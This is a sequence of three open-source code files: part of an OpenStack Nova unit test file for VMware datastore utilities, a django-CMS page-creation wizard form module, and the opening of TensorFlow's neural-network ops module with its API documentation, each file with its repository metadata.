ds_util.file_delete(self.session,
ds_path, 'fake-dc-ref')
_wait_for_task.assert_has_calls([
mock.call('fake_delete_task')])
def test_file_copy(self):
def fake_call_method(module, method, *args, **kwargs):
self.assertEqual('CopyDatastoreFile_Task', method)
src_name = kwargs.get('sourceName')
self.assertEqual('[ds] fake/path/src_file', src_name)
src_dc_ref = kwargs.get('sourceDatacenter')
self.assertEqual('fake-src-dc-ref', src_dc_ref)
dst_name = kwargs.get('destinationName')
self.assertEqual('[ds] fake/path/dst_file', dst_name)
dst_dc_ref = kwargs.get('destinationDatacenter')
self.assertEqual('fake-dst-dc-ref', dst_dc_ref)
return 'fake_copy_task'
with test.nested(
mock.patch.object(self.session, '_wait_for_task'),
mock.patch.object(self.session, '_call_method',
fake_call_method)
) as (_wait_for_task, _call_method):
src_ds_path = ds_obj.DatastorePath('ds', 'fake/path', 'src_file')
dst_ds_path = ds_obj.DatastorePath('ds', 'fake/path', 'dst_file')
ds_util.file_copy(self.session,
str(src_ds_path), 'fake-src-dc-ref',
str(dst_ds_path), 'fake-dst-dc-ref')
_wait_for_task.assert_has_calls([
mock.call('fake_copy_task')])
def test_file_move(self):
def fake_call_method(module, method, *args, **kwargs):
self.assertEqual('MoveDatastoreFile_Task', method)
sourceName = kwargs.get('sourceName')
self.assertEqual('[ds] tmp/src', sourceName)
destinationName = kwargs.get('destinationName')
self.assertEqual('[ds] base/dst', destinationName)
sourceDatacenter = kwargs.get('sourceDatacenter')
self.assertEqual('fake-dc-ref', sourceDatacenter)
destinationDatacenter = kwargs.get('destinationDatacenter')
self.assertEqual('fake-dc-ref', destinationDatacenter)
return 'fake_move_task'
with test.nested(
mock.patch.object(self.session, '_wait_for_task'),
mock.patch.object(self.session, '_call_method',
fake_call_method)
) as (_wait_for_task, _call_method):
src_ds_path = ds_obj.DatastorePath('ds', 'tmp/src')
dst_ds_path = ds_obj.DatastorePath('ds', 'base/dst')
ds_util.file_move(self.session,
'fake-dc-ref', src_ds_path, dst_ds_path)
_wait_for_task.assert_has_calls([
mock.call('fake_move_task')])
def test_disk_move(self):
def fake_call_method(module, method, *args, **kwargs):
self.assertEqual('MoveVirtualDisk_Task', method)
src_name = kwargs.get('sourceName')
self.assertEqual('[ds] tmp/src', src_name)
dest_name = kwargs.get('destName')
self.assertEqual('[ds] base/dst', dest_name)
src_datacenter = kwargs.get('sourceDatacenter')
self.assertEqual('fake-dc-ref', src_datacenter)
dest_datacenter = kwargs.get('destDatacenter')
self.assertEqual('fake-dc-ref', dest_datacenter)
return 'fake_move_task'
with test.nested(
mock.patch.object(self.session, '_wait_for_task'),
mock.patch.object(self.session, '_call_method',
fake_call_method)
) as (_wait_for_task, _call_method):
ds_util.disk_move(self.session,
'fake-dc-ref', '[ds] tmp/src', '[ds] base/dst')
_wait_for_task.assert_has_calls([
mock.call('fake_move_task')])
def test_disk_copy(self):
with test.nested(
mock.patch.object(self.session, '_wait_for_task'),
mock.patch.object(self.session, '_call_method',
return_value=mock.sentinel.cm)
) as (_wait_for_task, _call_method):
ds_util.disk_copy(self.session, mock.sentinel.dc_ref,
mock.sentinel.source_ds, mock.sentinel.dest_ds)
_wait_for_task.assert_called_once_with(mock.sentinel.cm)
_call_method.assert_called_once_with(
mock.ANY, 'CopyVirtualDisk_Task', 'VirtualDiskManager',
sourceName='sentinel.source_ds',
destDatacenter=mock.sentinel.dc_ref,
sourceDatacenter=mock.sentinel.dc_ref, force=False,
destName='sentinel.dest_ds')
def test_disk_delete(self):
with test.nested(
mock.patch.object(self.session, '_wait_for_task'),
mock.patch.object(self.session, '_call_method',
return_value=mock.sentinel.cm)
) as (_wait_for_task, _call_method):
ds_util.disk_delete(self.session,
'fake-dc-ref', '[ds] tmp/disk.vmdk')
_wait_for_task.assert_called_once_with(mock.sentinel.cm)
_call_method.assert_called_once_with(
mock.ANY, 'DeleteVirtualDisk_Task', 'VirtualDiskManager',
datacenter='fake-dc-ref', name='[ds] tmp/disk.vmdk')
def test_mkdir(self):
def fake_call_method(module, method, *args, **kwargs):
self.assertEqual('MakeDirectory', method)
name = kwargs.get('name')
self.assertEqual('[ds] fake/path', name)
datacenter = kwargs.get('datacenter')
self.assertEqual('fake-dc-ref', datacenter)
createParentDirectories = kwargs.get('createParentDirectories')
self.assertTrue(createParentDirectories)
with mock.patch.object(self.session, '_call_method',
fake_call_method):
ds_path = ds_obj.DatastorePath('ds', 'fake/path')
ds_util.mkdir(self.session, ds_path, 'fake-dc-ref')
def test_file_exists(self):
def fake_call_method(module, method, *args, **kwargs):
if method == 'SearchDatastore_Task':
ds_browser = args[0]
self.assertEqual('fake-browser', ds_browser)
datastorePath = kwargs.get('datastorePath')
self.assertEqual('[ds] fake/path', datastorePath)
return 'fake_exists_task'
# Should never get here
self.fail()
def fake_wait_for_task(task_ref):
if task_ref == 'fake_exists_task':
result_file = fake.DataObject()
result_file.path = 'fake-file'
result = fake.DataObject()
result.file = [result_file]
result.path = '[ds] fake/path'
task_info = fake.DataObject()
task_info.result = result
return task_info
# Should never get here
self.fail()
with test.nested(
mock.patch.object(self.session, '_call_method',
fake_call_method),
mock.patch.object(self.session, '_wait_for_task',
fake_wait_for_task)):
ds_path = ds_obj.DatastorePath('ds', 'fake/path')
file_exists = ds_util.file_exists(self.session,
'fake-browser', ds_path, 'fake-file')
self.assertTrue(file_exists)
def test_file_exists_fails(self):
def fake_call_method(module, method, *args, **kwargs):
if method == 'SearchDatastore_Task':
return 'fake_exists_task'
# Should never get here
self.fail()
def fake_wait_for_task(task_ref):
if task_ref == 'fake_exists_task':
raise vexc.FileNotFoundException()
# Should never get here
self.fail()
with test.nested(
mock.patch.object(self.session, '_call_method',
fake_call_method),
mock.patch.object(self.session, '_wait_for_task',
fake_wait_for_task)):
ds_path = ds_obj.DatastorePath('ds', 'fake/path')
file_exists = ds_util.file_exists(self.session,
'fake-browser', ds_path, 'fake-file')
self.assertFalse(file_exists)
def _mock_get_datastore_calls(self, *datastores):
"""Mock vim_util calls made by get_datastore."""
datastores_i = [None]
# For the moment, at least, this list of datastores is simply passed to
# get_properties_for_a_collection_of_objects, which we mock below. We
# don't need to over-complicate the fake function by worrying about its
# contents.
fake_ds_list = ['fake-ds']
def fake_call_method(module, method, *args, **kwargs):
# Mock the call which returns a list of datastores for the cluster
if (module == ds_util.vutil and
method == 'get_object_property' and
args == ('fake-cluster', 'datastore')):
fake_ds_mor = fake.DataObject()
fake_ds_mor.ManagedObjectReference = fake_ds_list
return fake_ds_mor
# Return the datastore result sets we were passed in, in the order
# given
if (module == ds_util.vim_util and
method == 'get_properties_for_a_collection_of_objects' and
args[0] == 'Datastore' and
args[1] == fake_ds_list):
# Start a new iterator over given datastores
datastores_i[0] = iter(datastores)
return next(datastores_i[0])
# Continue returning results from the current iterator.
if (module == ds_util.vutil and
method == 'continue_retrieval'):
try:
return next(datastores_i[0])
except StopIteration:
return None
if (method == 'continue_retrieval' or
method == 'cancel_retrieval'):
return
# Sentinel that get_datastore's use of vim has changed
self.fail('Unexpected vim call in get_datastore: %s' % method)
return mock.patch.object(self.session, '_call_method',
side_effect=fake_call_method)
def test_get_datastore(self):
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore())
fake_objects.add_object(fake.Datastore("fake-ds-2", 2048, 1000,
False, "normal"))
fake_objects.add_object(fake.Datastore("fake-ds-3", 4096, 2000,
True, "inMaintenance"))
with self._mock_get_datastore_calls(fake_objects):
result = ds_util.get_datastore(self.session, 'fake-cluster')
self.assertEqual("fake-ds", result.name)
self.assertEqual(units.Ti, result.capacity)
self.assertEqual(500 * units.Gi, result.freespace)
def test_get_datastore_with_regex(self):
# Test with a regex that matches with a datastore
datastore_valid_regex = re.compile(r"^openstack.*\d$")
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore("openstack-ds0"))
fake_objects.add_object(fake.Datastore("fake-ds0"))
fake_objects.add_object(fake.Datastore("fake-ds1"))
with self._mock_get_datastore_calls(fake_objects):
result = ds_util.get_datastore(self.session, 'fake-cluster',
datastore_valid_regex)
self.assertEqual("openstack-ds0", result.name)
def test_get_datastore_with_token(self):
regex = re.compile(r"^ds.*\d$")
fake0 = fake.FakeRetrieveResult()
fake0.add_object(fake.Datastore("ds0", 10 * units.Gi, 5 * units.Gi))
fake0.add_object(fake.Datastore("foo", 10 * units.Gi, 9 * units.Gi))
setattr(fake0, 'token', 'token-0')
fake1 = fake.FakeRetrieveResult()
fake1.add_object(fake.Datastore("ds2", 10 * units.Gi, 8 * units.Gi))
fake1.add_object(fake.Datastore("ds3", 10 * units.Gi, 1 * units.Gi))
with self._mock_get_datastore_calls(fake0, fake1):
result = ds_util.get_datastore(self.session, 'fake-cluster', regex)
self.assertEqual("ds2", result.name)
def test_get_datastore_with_list(self):
# Test with a regex containing whitelist of datastores
datastore_valid_regex = re.compile("(openstack-ds0|openstack-ds2)")
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore("openstack-ds0"))
fake_objects.add_object(fake.Datastore("openstack-ds1"))
fake_objects.add_object(fake.Datastore("openstack-ds2"))
with self._mock_get_datastore_calls(fake_objects):
result = ds_util.get_datastore(self.session, 'fake-cluster',
datastore_valid_regex)
self.assertNotEqual("openstack-ds1", result.name)
def test_get_datastore_with_regex_error(self):
# Test with a regex that has no match
# Checks if code raises DatastoreNotFound with a specific message
datastore_invalid_regex = re.compile("unknown-ds")
exp_message = ("Datastore regex %s did not match any datastores"
% datastore_invalid_regex.pattern)
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore("fake-ds0"))
fake_objects.add_object(fake.Datastore("fake-ds1"))
# assertRaisesRegExp would have been a good choice instead of
# try/catch block, but it's available only from Py 2.7.
try:
with self._mock_get_datastore_calls(fake_objects):
ds_util.get_datastore(self.session, 'fake-cluster',
datastore_invalid_regex)
except exception.DatastoreNotFound as e:
self.assertEqual(exp_message, e.args[0])
else:
self.fail("DatastoreNotFound Exception was not raised with "
"message: %s" % exp_message)
def test_get_datastore_without_datastore(self):
self.assertRaises(exception.DatastoreNotFound,
ds_util.get_datastore,
fake.FakeObjectRetrievalSession(None), cluster="fake-cluster")
def test_get_datastore_inaccessible_ds(self):
data_store = fake.Datastore()
data_store.set("summary.accessible", False)
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(data_store)
with self._mock_get_datastore_calls(fake_objects):
self.assertRaises(exception.DatastoreNotFound,
ds_util.get_datastore,
self.session, 'fake-cluster')
def test_get_datastore_ds_in_maintenance(self):
data_store = fake.Datastore()
data_store.set("summary.maintenanceMode", "inMaintenance")
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(data_store)
with self._mock_get_datastore_calls(fake_objects):
self.assertRaises(exception.DatastoreNotFound,
ds_util.get_datastore,
self.session, 'fake-cluster')
def test_get_datastore_no_host_in_cluster(self):
def fake_call_method(module, method, *args, **kwargs):
return ''
with mock.patch.object(self.session, '_call_method',
fake_call_method):
self.assertRaises(exception.DatastoreNotFound,
ds_util.get_datastore,
self.session, 'fake-cluster')
def _test_is_datastore_valid(self, accessible=True,
maintenance_mode="normal",
type="VMFS",
datastore_regex=None,
ds_types=ds_util.ALL_SUPPORTED_DS_TYPES):
propdict = {}
propdict["summary.accessible"] = accessible
propdict["summary.maintenanceMode"] = maintenance_mode
propdict["summary.type"] = type
propdict["summary.name"] = "ds-1"
return ds_util._is_datastore_valid(propdict, datastore_regex, ds_types)
def test_is_datastore_valid(self):
for ds_type in ds_util.ALL_SUPPORTED_DS_TYPES:
self.assertTrue(self._test_is_datastore_valid(True,
"normal",
ds_type))
def test_is_datastore_valid_inaccessible_ds(self):
self.assertFalse(self._test_is_datastore_valid(False,
"normal",
"VMFS"))
def test_is_datastore_valid_ds_in_maintenance(self):
self.assertFalse(self._test_is_datastore_valid(True,
"inMaintenance",
"VMFS"))
def test_is_datastore_valid_ds_type_invalid(self):
self.assertFalse(self._test_is_datastore_valid(True,
"normal",
"vfat"))
def test_is_datastore_valid_not_matching_regex(self):
datastore_regex = re.compile("ds-2")
self.assertFalse(self._test_is_datastore_valid(True,
"normal",
"VMFS",
datastore_regex))
def test_is_datastore_valid_matching_regex(self):
datastore_regex = re.compile("ds-1")
self.assertTrue(self._test_is_datastore_valid(True,
"normal",
"VMFS",
datastore_regex))
def test_get_connected_hosts_none(self):
with mock.patch.object(self.session,
'_call_method') as _call_method:
hosts = ds_util.get_connected_hosts(self.session,
'fake_datastore')
self.assertEqual([], hosts)
_call_method.assert_called_once_with(
mock.ANY, 'get_object_property',
'fake_datastore', 'host')
def test_get_connected_hosts(self):
host = mock.Mock(spec=object)
host.value = 'fake-host'
host_mount = mock.Mock(spec=object)
host_mount.key = host
host_mounts = mock.Mock(spec=object)
host_mounts.DatastoreHostMount = [host_mount]
with mock.patch.object(self.session, '_call_method',
return_value=host_mounts) as _call_method:
hosts = ds_util.get_connected_hosts(self.session,
'fake_datastore')
self.assertEqual(['fake-host'], hosts)
_call_method.assert_called_once_with(
mock.ANY, 'get_object_property',
'fake_datastore', 'host')
|
{
"content_hash": "62299929583a098c86ad56537d02049c",
"timestamp": "",
"source": "github",
"line_count": 471,
"max_line_length": 79,
"avg_line_length": 45.34819532908705,
"alnum_prop": 0.5480593660751908,
"repo_name": "rahulunair/nova",
"id": "ce10dc430fbf689a5c501c132ae2eca4fce0e26c",
"size": "21968",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nova/tests/unit/virt/vmwareapi/test_ds_util.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "PHP",
"bytes": "3325"
},
{
"name": "Python",
"bytes": "22804450"
},
{
"name": "Shell",
"bytes": "41649"
},
{
"name": "Smarty",
"bytes": "472764"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django import forms
from django.contrib.sites.models import Site
from django.core.exceptions import PermissionDenied
from django.utils.encoding import smart_text
from django.utils.translation import (
ugettext,
ugettext_lazy as _,
get_language,
)
from cms.api import generate_valid_slug
from cms.constants import PAGE_TYPES_ID
from cms.exceptions import NoPermissionsException
from cms.models import Page, Title
from cms.models.titlemodels import EmptyTitle
from cms.plugin_pool import plugin_pool
from cms.utils import permissions
from cms.utils.compat.dj import is_installed
from cms.utils.urlutils import static_with_version
from cms.utils.conf import get_cms_setting
try:
# djangocms_text_ckeditor is not guaranteed to be available
from djangocms_text_ckeditor.widgets import TextEditorWidget
text_widget = TextEditorWidget
except ImportError:
text_widget = forms.Textarea
def user_has_view_permission(user, page=None):
"""
This code largely duplicates Page.has_view_permission(). We do this because
the source method requires a request object, which isn't appropriate in
this case. Fortunately, the source method (and its dependencies) use the
request object only to get the user object, when it isn't explicitly
provided and for caching permissions. We don't require caching here and we
can explicitly provide the user object.
"""
if not user:
return False
class FakeRequest(object):
pass
fake_request = FakeRequest()
can_see_unrestricted = get_cms_setting('PUBLIC_FOR') == 'all' or (
get_cms_setting('PUBLIC_FOR') == 'staff' and user.is_staff)
# Inherited and direct view permissions
is_restricted = bool(
permissions.get_any_page_view_permissions(fake_request, page))
if not is_restricted and can_see_unrestricted:
return True
elif not user.is_authenticated():
return False
if not is_restricted:
# a global permission was given to the request's user
if permissions.has_global_page_permission(
fake_request, page.site_id, user=user, can_view=True):
return True
else:
# a specific permission was granted to the request's user
if page.get_draft_object().has_generic_permission(
fake_request, "view", user=user):
return True
# The user has a normal django permission to view pages globally
opts = page._meta
codename = '%s.view_%s' % (opts.app_label, opts.object_name.lower())
return user.has_perm(codename)
class PageTypeSelect(forms.widgets.Select):
"""
Special widget for the page_type choice-field. This simply adds some JS for
hiding/showing the content field based on the selection of this select.
"""
class Media:
js = (
'cms/js/modules/jquery.noconflict.pre.js',
'cms/js/dist/bundle.admin.base.min.js',
'cms/js/modules/cms.base.js',
'cms/js/widgets/wizard.pagetypeselect.js',
'cms/js/modules/jquery.noconflict.post.js',
)
js = tuple(map(static_with_version, js))
class BaseCMSPageForm(forms.Form):
title = forms.CharField(
label=_(u'Title'), max_length=255,
help_text=_(u"Provide a title for the new page."))
slug = forms.SlugField(
label=_(u'Slug'), max_length=255, required=False,
help_text=_(u"Leave empty for automatic slug, or override as required.")
)
page_type = forms.ChoiceField(
label=_(u'Page type'), required=False, widget=PageTypeSelect())
content = forms.CharField(
label=_(u'Content'), widget=text_widget, required=False,
help_text=_(u"Optional. If supplied, will be automatically added "
u"within a new text plugin."))
def __init__(self, instance=None, *args, **kwargs):
# Expect instance argument here, as we have to accept some of the
# ModelForm __init__() arguments here for the ModelFormMixin cbv
self.instance = instance
super(BaseCMSPageForm, self).__init__(*args, **kwargs)
if self.page:
site = self.page.site_id
else:
site = Site.objects.get_current()
# Either populate, or remove the page_type field
if 'page_type' in self.fields:
root = Page.objects.filter(publisher_is_draft=True,
reverse_id=PAGE_TYPES_ID,
site=site).first()
if root:
page_types = root.get_descendants()
else:
page_types = Page.objects.none()
if root and page_types:
# Set the choicefield's choices to the various page_types
language = get_language()
type_ids = page_types.values_list('pk', flat=True)
titles = Title.objects.filter(page__in=type_ids,
language=language)
choices = [('', '---------')]
for title in titles:
choices.append((title.page_id, title.title))
self.fields['page_type'].choices = choices
else:
# There are no page_types, so don't bother the user with an
# empty choice field.
del self.fields['page_type']
class CreateCMSPageForm(BaseCMSPageForm):
@staticmethod
def create_page_titles(page, title, languages):
# Import here due to potential circular dependency issues
from cms.api import create_title
for language in languages:
title_obj = page.get_title_obj(language=language, fallback=False)
if isinstance(title_obj, EmptyTitle):
create_title(language, title, page)
@staticmethod
def get_first_placeholder(page):
"""
Returns the first editable, non-static placeholder or None.
"""
for placeholder in page.get_placeholders():
if not placeholder.is_static and placeholder.is_editable:
return placeholder
else:
return None
def clean(self):
"""
Validates that either the slug is provided, or that slugification from
`title` produces a valid slug.
:return:
"""
cleaned_data = super(CreateCMSPageForm, self).clean()
slug = cleaned_data.get("slug")
sub_page = cleaned_data.get("sub_page")
title = cleaned_data.get("title")
if self.page:
if sub_page:
parent = self.page
else:
parent = self.page.parent
else:
parent = None
if slug:
starting_point = slug
elif title:
starting_point = title
else:
starting_point = _("page")
slug = generate_valid_slug(starting_point, parent, self.language_code)
if not slug:
raise forms.ValidationError("Please provide a valid slug.")
cleaned_data["slug"] = slug
return cleaned_data
def save(self, **kwargs):
from cms.api import create_page, add_plugin
from cms.utils.permissions import has_page_add_permission
# Check to see if this user has permissions to make this page. We've
# already checked this when producing a list of wizard entries, but this
# is to prevent people from possible form-hacking.
if 'sub_page' in self.cleaned_data:
sub_page = self.cleaned_data['sub_page']
else:
sub_page = False
if self.page:
if sub_page:
parent = self.page
position = "last-child"
else:
parent = self.page.parent
position = "right"
else:
parent = None
position = "last-child"
# Before we do this, verify this user has perms to do so.
if not (self.user.is_superuser or
has_page_add_permission(self.user, self.page,
position=position,
site=self.page.site)):
raise NoPermissionsException(
_(u"User does not have permission to add page."))
page = create_page(
title=self.cleaned_data['title'],
slug=self.cleaned_data['slug'],
template=get_cms_setting('WIZARD_DEFAULT_TEMPLATE'),
language=self.language_code,
created_by=smart_text(self.user),
parent=parent,
in_navigation=True,
published=False
)
page_type = self.cleaned_data.get("page_type")
if page_type:
copy_target = Page.objects.filter(pk=page_type).first()
else:
copy_target = None
if copy_target:
# If the user selected a page type, copy that.
if not user_has_view_permission(self.user, copy_target):
raise PermissionDenied()
# Copy page attributes
copy_target._copy_attributes(page, clean=True)
page.save()
# Copy contents (for each language)
for lang in copy_target.get_languages():
copy_target._copy_contents(page, lang)
# Copy extensions
from cms.extensions import extension_pool
extension_pool.copy_extensions(copy_target, page)
else:
# If the user provided content, then use that instead.
content = self.cleaned_data.get('content')
plugin_type = get_cms_setting('WIZARD_CONTENT_PLUGIN')
plugin_body = get_cms_setting('WIZARD_CONTENT_PLUGIN_BODY')
if plugin_type in plugin_pool.plugins and plugin_body:
if content and permissions.has_plugin_permission(
self.user, plugin_type, "add"):
placeholder = self.get_first_placeholder(page)
if placeholder:
add_plugin(**{
'placeholder': placeholder,
'plugin_type': plugin_type,
'language': self.language_code,
plugin_body: content,
})
if is_installed('reversion'):
from cms.utils.helpers import make_revision_with_plugins
from cms.admin.pageadmin import INITIAL_COMMENT
from cms.utils.reversion_hacks import create_revision
with create_revision():
make_revision_with_plugins(
obj=page,
user=self.user,
message=ugettext(INITIAL_COMMENT),
)
return page
class CreateCMSSubPageForm(CreateCMSPageForm):
sub_page = forms.BooleanField(initial=True, widget=forms.HiddenInput)
|
{
"content_hash": "e598eea20447c19fe0e073449083ccfd",
"timestamp": "",
"source": "github",
"line_count": 300,
"max_line_length": 80,
"avg_line_length": 36.71666666666667,
"alnum_prop": 0.5893781207444394,
"repo_name": "keimlink/django-cms",
"id": "61f80fe1722faefef678edd9ae641bb222a5e7a4",
"size": "11040",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "cms/forms/wizards.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "128012"
},
{
"name": "HTML",
"bytes": "105180"
},
{
"name": "JavaScript",
"bytes": "667899"
},
{
"name": "Python",
"bytes": "1978594"
},
{
"name": "XSLT",
"bytes": "5917"
}
],
"symlink_target": ""
}
|
"""## Activation Functions
The activation ops provide different types of nonlinearities for use in
neural networks. These include smooth nonlinearities (`sigmoid`,
`tanh`, and `softplus`), continuous but not everywhere differentiable
functions (`relu`, `relu6`, and `relu_x`), and random regularization
(`dropout`).
All activation ops apply componentwise, and produce a tensor of the same
shape as the input tensor.
@@relu
@@relu6
@@softplus
@@dropout
@@bias_add
@@sigmoid
@@tanh
## Convolution
The convolution ops sweep a 2-D filter over a batch of images, applying the
filter to each window of each image of the appropriate size. The different
ops trade off between generic vs. specific filters:
* `conv2d`: Arbitrary filters that can mix channels together.
* `depthwise_conv2d`: Filters that operate on each channel independently.
* `separable_conv2d`: A depthwise spatial filter followed by a pointwise filter.
Note that although these ops are called "convolution", they are strictly
speaking "cross-correlation" since the filter is combined with an input window
without reversing the filter. For details, see [the properties of
cross-correlation](https://en.wikipedia.org/wiki/Cross-correlation#Properties).
The filter is applied to image patches of the same size as the filter and
strided according to the `strides` argument. `strides = [1, 1, 1, 1]` applies
the filter to a patch at every offset, `strides = [1, 2, 2, 1]` applies the
filter to every other image patch in each dimension, etc.
Ignoring channels for the moment, and assume that the the 4-D `input` has shape
`[batch, in_height, in_width, ...]` and the 4-D `filter` has shape
`[filter_height, filter_width, ...]`, then the spatial semantics of the
convolution ops are as follows: first, according to the padding scheme chosen
as `'SAME'` or `'VALID'`, the output size and the padding pixels are computed.
For the `'SAME'` padding, the output height and width are computed as:
out_height = ceil(float(in_height) / float(strides[1]))
out_width = ceil(float(in_width) / float(stides[2]))
and the padding on the top and left are computed as:
pad_along_height = ((out_height - 1) * strides[1] +
filter_height - in_height)
pad_along_width = ((out_width - 1) * strides[2] +
filter_width - in_width)
pad_top = pad_along_height / 2
pad_left = pad_along_width / 2
Note that the division by 2 means that there might be cases when the padding on
both sides (top vs bottom, right vs left) are off by one. In this case, the
bottom and right sides always get the one additional padded pixel. For example,
when `pad_along_height` is 5, we pad 2 pixels at the top and 3 pixels at the
bottom. Note that this is different from existing libraries such as cuDNN and
Caffe, which explicitly specify the number of padded pixels and always pad the
same number of pixels on both sides.
For the `'VALID`' padding, the output height and width are computed as:
out_height = ceil(float(in_height - filter_height + 1) / float(strides[1]))
out_width = ceil(float(in_width - filter_width + 1) / float(stides[2]))
and the padding values are always zero. The output is then computed as
output[b, i, j, :] =
sum_{di, dj} input[b, strides[1] * i + di - pad_top,
strides[2] * j + dj - pad_left, ...] *
filter[di, dj, ...]
where any value outside the original input image region are considered zero (
i.e. we pad zero values around the border of the image).
Since `input` is 4-D, each `input[b, i, j, :]` is a vector. For `conv2d`, these
vectors are multiplied by the `filter[di, dj, :, :]` matrices to produce new
vectors. For `depthwise_conv_2d`, each scalar component `input[b, i, j, k]`
is multiplied by a vector `filter[di, dj, k]`, and all the vectors are
concatenated.
@@conv2d
@@depthwise_conv2d
@@separable_conv2d
## Pooling
The pooling ops sweep a rectangular window over the input tensor, computing a
reduction operation for each window (average, max, or max with argmax). Each
pooling op uses rectangular windows of size `ksize` separated by offset
`strides`. For example, if `strides` is all ones every window is used, if
`strides` is all twos every other window is used in each dimension, etc.
In detail, the output is
output[i] = reduce(value[strides * i:strides * i + ksize])
where the indices also take into consideration the padding values. Please refer
to the `Convolution` section for details about the padding calculation.
@@avg_pool
@@max_pool
@@max_pool_with_argmax
## Normalization
Normalization is useful to prevent neurons from saturating when inputs may
have varying scale, and to aid generalization.
@@l2_normalize
@@local_response_normalization
@@moments
## Losses
The loss ops measure error between two tensors, or between a tensor and zero.
These can be used for measuring accuracy of a network in a regression task
or for regularization purposes (weight decay).
@@l2_loss
## Classification
TensorFlow provides several operations that help you perform classification.
@@sigmoid_cross_entropy_with_logits
@@softmax
@@softmax_cross_entropy_with_logits
## Embeddings
TensorFlow provides library support for looking up values in embedding
tensors.
@@embedding_lookup
## Evaluation
The evaluation ops are useful for measuring the performance of a network.
Since they are nondifferentiable, they are typically used at evaluation time.
@@top_k
@@in_top_k
## Candidate Sampling
Do you want to train a multiclass or multilabel model with thousands
or millions of output classes (for example, a language model with a
large vocabulary)? Training with a full Softmax is slow in this case,
since all of the classes are evaluated for every training example.
Candidate Sampling training algorithms can speed up your step times by
only considering a small randomly-chosen subset of contrastive classes
(called candidates) for each batch of training examples.
See our [Candidate Sampling Algorithms Reference]
(../../extras/candidate_sampling.pdf)
### Sampled Loss Functions
TensorFlow provides the following sampled loss functions for faster training.
@@nce_loss
@@sampled_softmax_loss
### Candidate Samplers
TensorFlow provides the following samplers for randomly sampling candidate
classes when using one of the sampled loss functions above.
@@uniform_candidate_sampler
@@log_uniform_candidate_sampler
@@learned_unigram_candidate_sampler
@@fixed_unigram_candidate_sampler
### Miscellaneous candidate sampling utilities
@@compute_accidental_hits
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import candidate_sampling_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_grad
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import numerics
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops.math_ops import sigmoid
from tensorflow.python.ops.math_ops import tanh
# Bring more nn-associated functionality into this package.
from tensorflow.python.ops.nn_ops import *
from tensorflow.python.ops.candidate_sampling_ops import *
from tensorflow.python.ops.embedding_ops import *
def sigmoid_cross_entropy_with_logits(logits, targets, name=None):
"""Computes sigmoid cross entropy given `logits`.
Measures the probability error in discrete classification tasks in which each
class is independent and not mutually exclusive. For instance, one could
perform multilabel classification where a picture can contain both an elephant
and a dog at the same time.
For brevity, let `x = logits`, `z = targets`. The logistic loss is
x - x * z + log(1 + exp(-x))
To ensure stability and avoid overflow, the implementation uses
max(x, 0) - x * z + log(1 + exp(-abs(x)))
`logits` and `targets` must have the same type and shape.
Args:
logits: A `Tensor` of type `float32` or `float64`.
targets: A `Tensor` of the same type and shape as `logits`.
name: A name for the operation (optional).
Returns:
A `Tensor` of the same shape as `logits` with the componentwise
logistic losses.
"""
with ops.op_scope([logits, targets], name, "logistic_loss") as name:
logits = ops.convert_to_tensor(logits, name="logits")
targets = ops.convert_to_tensor(targets, name="targets")
# The logistic loss formula from above is
# x - x * z + log(1 + exp(-x))
# For x < 0, a more numerically stable formula is
# -x * z + log(1 + exp(x))
# To avoid branching, we use the combined version
# max(x, 0) - x * z + log(1 + exp(-abs(x)))
return math_ops.add(nn_ops.relu(logits) - logits * targets,
math_ops.log(1 + math_ops.exp(-math_ops.abs(logits))),
name=name)
def xw_plus_b(x, weights, biases, name=None):
"""Computes matmul(x, weights) + biases.
Args:
x: a 2D tensor. Dimensions typically: batch, in_units
weights: a 2D tensor. Dimensions typically: in_units, out_units
biases: a 1D tensor. Dimensions: out_units
name: A name for the operation (optional). If not specified
"wx_plus_b" is used.
Returns:
A 2-D Tensor computing matmul(x, weights) + biases.
Dimensions typically: batch, out_units.
"""
with ops.op_scope([x, weights, biases], name, "xw_plus_b") as name:
x = ops.convert_to_tensor(x, name="x")
weights = ops.convert_to_tensor(weights, name="weights")
biases = ops.convert_to_tensor(biases, name="biases")
mm = math_ops.matmul(x, weights)
return nn_ops.bias_add(mm, biases, name=name)
def relu_layer(x, weights, biases, name=None):
"""Computes Relu(x * weight + biases).
Args:
x: a 2D tensor. Dimensions typically: batch, in_units
weights: a 2D tensor. Dimensions typically: in_units, out_units
biases: a 1D tensor. Dimensions: out_units
name: A name for the operation (optional). If not specified
"nn_relu_layer" is used.
Returns:
A 2-D Tensor computing relu(matmul(x, weights) + biases).
Dimensions typically: batch, out_units.
"""
with ops.op_scope([x, weights, biases], name, "relu_layer") as name:
x = ops.convert_to_tensor(x, name="x")
weights = ops.convert_to_tensor(weights, name="weights")
biases = ops.convert_to_tensor(biases, name="biases")
xw_plus_b = nn_ops.bias_add(math_ops.matmul(x, weights), biases)
return nn_ops.relu(xw_plus_b, name=name)
def l2_normalize(x, dim, epsilon=1e-12, name=None):
"""Normalizes along dimension `dim` using an L2 norm.
For a 1-D tensor with `dim = 0`, computes
output = x / sqrt(max(sum(x**2), epsilon))
For `x` with more dimensions, independently normalizes each 1-D slice along
dimension `dim`.
Args:
x: A `Tensor`.
dim: Dimension along which to normalize.
epsilon: A lower bound value for the norm. Will use `sqrt(epsilon)` as the
